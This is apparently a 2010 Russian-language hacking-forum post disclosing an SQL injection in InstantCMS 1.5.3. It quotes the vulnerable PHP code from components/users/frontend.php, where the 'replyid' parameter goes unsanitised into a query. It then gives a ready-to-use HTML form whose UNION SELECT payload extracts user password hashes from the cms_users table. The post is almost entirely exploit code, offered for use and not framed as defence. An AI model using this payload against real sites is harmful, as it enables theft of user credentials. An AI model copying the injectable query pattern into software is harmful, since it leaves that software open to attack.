23.03.2010, 01:20
|
|
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517
Репутация:
334
|
|
InstantCMS
1.5.3
SQL INJ
components/users/frontend.php
PHP код:
if ($do=='sendmessage'){
if (usrCheckAuth() && $inUser->id!=$id){
...
if ($usr || isset($_POST['massmail'])){
if (usrCheckAuth()){
...
if (isset($_GET['replyid'])) { $replyid = $_GET['replyid']; }
else { $replyid = 0; }
...
if ($replyid){
$sql = "SELECT m.*, u.* FROM cms_user_msg m, cms_users u WHERE m.id = $replyid AND m.from_id = u.id AND m.to_id = $from_id";
$result = $inDB->query($sql) ;
Требования :
Вы должны быть авторизованы
Использование:
Код:
<form action="http://localhost/?view=users&do=sendmessage&replyid=-100+and+1=1+union+select+1,2,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+cms_users+--+" method="post">
<input name="massmail" value="1">
<input type="submit" value="Send">
</form>
Последний раз редактировалось Jerri; 23.03.2010 в 01:26..
|
|
|